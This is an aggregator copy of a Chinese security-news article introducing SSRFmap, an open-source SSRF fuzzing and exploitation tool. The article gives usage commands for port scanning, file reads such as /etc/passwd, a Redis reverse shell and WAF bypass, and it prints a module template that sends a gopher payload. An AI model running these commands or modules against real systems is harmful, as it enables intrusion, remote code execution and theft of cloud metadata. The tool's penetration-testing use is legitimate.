

SSRFmap:一款功能强大的自动化SSRF模糊测试&漏洞利用工具
source link: https://www.freebuf.com/sectool/197353.html?amp%3Butm_medium=referral
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.

SSRF,即 服务器端请求伪造 ,很多网络犯罪分子都会利用SSRF来攻击或入侵网络服务。今天我们给大家介绍的这款工具名叫SSRFmap,它可以寻找并利用目标网络服务中的SSRF漏洞。
SSRFmap以Burp请求文件作为输入,研究人员可以利用参数选项来控制模糊测试的操作进程。
项目地址
SSRFmap:【 GitHub传送门 】
工具安装
大家可以直接从GitHub代码库中克隆该项目至本地:
git clone https://github.com/swisskyrepo/SSRFmap
cd SSRFmap/
python3 ssrfmap.py
usage:ssrfmap.py [-h] [-r REQFILE] [-p PARAM] [-m MODULES] [--lhost LHOST] [--lportLPORT] [--level LEVEL]
optional arguments:
-h, --help show this help message and exit
-r REQFILE SSRF Request file
-p PARAM SSRF Parameter to target
-m MODULES SSRF Modules to enable
-l HANDLER Start an handler for a reverseshell
--lhost LHOST LHOST reverse shell
--lport LPORT LPORT reverse shell
--level [LEVEL] Level of test to perform (1-5, default: 1)
工具使用
SSRFmap的默认使用方法如下:
#Launch a portscan on localhost and read default files python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan #Triggering a reverse shell on a Redis python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242-l 4242 # -lcreate a listener for reverse shell on the specified port #--lhost and --lport work like in Metasploit, these values are used to create areverse shell payload #--level : ability to tweak payloads in order to bypass some IDS/WAF. e.g:127.0.0.1 -> [::] -> 0000: -> ...
大姐可以使用data/example.py来测试框架是否能够正常运行:
FLASK_APP=data/example.pyflask run & python ssrfmap.py -r data/request.txt -p url -m readfiles
功能模块
SSRFmap已整合了下列功能模块,大家可以使用-m参数来选择使用:
模块名称 模块描述 fastcgi FastCGI RCE redis Redis RCE github Github 企业版 RCE < 2.8.7 zabbix Zabbix RCE mysql MySQL 命令执行 docker Docker Infoleaks ( API ) smtp SMTP 邮件发送 Portscan 主机端口扫描 networkscan HTTP Ping sweep readfiles 文件读取,例如 /etc/passwd alibaba 从供应商处读取文件 ( 例如 : meta-data, user-data) aws 从供应商处读取文件 ( 例如 : meta-data, user-data) gce 从供应商处读取文件 ( 例如 : meta-data, user-data) digitalocean 从供应商处读取文件 ( 例如 : meta-data, user-data) socksproxy SOCKS4 代理 smbhash 通过 UNC Path 破解 SMB 认证 tomcat 爆破 Tomcat Manager如果各位想针对特定服务添加自己的功能模块,可以参考下面这个模板代码:
from core.utils import *
import logging
name = "servicename inlowercase"
description = "ServiceName RCE - What does itdo"
author = "Name or pseudo of theauthor"
documentation= [" http://link_to_a_research ", " http://another_link "]
class exploit():
SERVER_HOST = "127.0.0.1"
SERVER_PORT = "4242"
def __init__(self, requester, args):
logging.info("Module '{}' launched!".format(name))
# Handle args for reverse shell
if args.lhost == None: self.SERVER_HOST= input("Server Host:")
else: self.SERVER_HOST = args.lhost
if args.lport == None: self.SERVER_PORT= input("Server Port:")
else: self.SERVER_PORT = args.lport
# Data for the service
# Using a generator to create the hostlist
# Edit the following ip if you need totarget something else
gen_host =gen_ip_list("127.0.0.1", args.level)
for ip in gen_host:
port = "6379"
data ="*1%0d%0a$8%0d%0aflus[...]%0aquit%0d%0a"
payload = wrapper_gopher(data, ip ,port)
# Handle args for reverse shell
payload = payload.replace("SERVER_HOST",self.SERVER_HOST)
payload =payload.replace("SERVER_PORT", self.SERVER_PORT)
# Send the payload
r =requester.do_request(args.param, payload)
*参考来源: SSRFmap ,FB小编Alpha_h4ck编译,转载请注明来自FreeBuf.COM
Recommend
-
81
README.md SSRFmap
-
28
今天给大家介绍的是一款名叫Pompem的开源工具,该工具可以在当前最热门或最重要的漏洞数据库中搜索漏洞以及相应的漏洞利用代码。该工具采用Pyth...
-
46
为了评估安全检测与事件响应能力,我们正在尝试寻找一种自动化模拟对手攻击策略的方式。通过研究,我们设计出了MITRE ATT&CK™ TTPs,并以Me...
-
35
工具介绍 PacBot,全名为“Policy as Code Bot”,它是一款针对云环境的持续性安全监控平台。在PacBot中,安全策略与合规性策略均通过...
-
42
今天给大家介绍的是一款名叫autoPwn的强大工具,广大研究人员可以利用这款工具来自动化完成一些需要重复执行的模糊测试任务。 工具概...
-
75
NetSet NetSet是一款自动化安全增强工具,该工具的主要目的就是将很多复杂的操作以自动化的方式实现,并帮助用户保证网络流量的安全...
-
13
Tishna是一款功能强大的自动化Web应用渗透测试框架,广大Web安全研究人员可使用该工具来对Web服务器以及应用程序层来进行安全分析。从本质上来说,Tishna可谓是Web安全领域的一把“瑞士**”了。 工具接口
-
7
Rustpad:一款功能强大的多线程Padding Oracle漏洞挖掘工具 Alpha_h4ck 2022-01-19 22:37:30 13481
-
6
Second Order:一款功能强大的子域名接管漏洞安全扫描工具-51CTO.COM Second Order:一款功能强大的子域名接管漏洞安全扫描工具 作者:Alpha_h4ck 2022-02-20 18:59:23
-
3
Facebook:微服务的模糊自动化测试由 乔梁 | 2022-04-24让开发人员能够快速开发原型、测试和迭代新功能对 Facebook 的成功至关重要。为了有效地...
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK